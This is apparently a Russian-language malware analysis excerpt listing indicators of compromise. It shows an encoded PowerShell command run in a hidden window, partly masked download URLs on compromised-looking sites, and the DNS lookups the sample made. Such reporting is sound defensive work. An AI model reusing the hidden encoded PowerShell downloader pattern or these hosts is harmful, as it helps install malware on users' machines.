Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGQAcABhAGQAaQBmAHAAeABtAHQAdAA9ACcARABrAHUAawB0AG4AZwB5AHMAJwA7ACQATgB5AGIAaQBjAGsAbQBlAGEAbAAgAD...
- http://www.qu####lutions.com/wp-includes/u3qtj/
- http://sh#####aramschool.com/agaram/ogAHP/
- http://www.le#####asshostel.net/sdlkitj8kfd/j2y/
- DNS ASK qu####lutions.com
- DNS ASK rc####ithimpact.org
- DNS ASK sh#####aramschool.com
- DNS ASK bi####ntexting.com
- DNS ASK le#####asshostel.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGQAcABhAGQAaQBmAHAAeABtAHQAdAA9ACcARABrAHUAawB0AG4AZwB5AHMAJwA7ACQATgB5AGIAaQBjAGsAbQBlAGEAbAAgAD...' (со скрытым окном)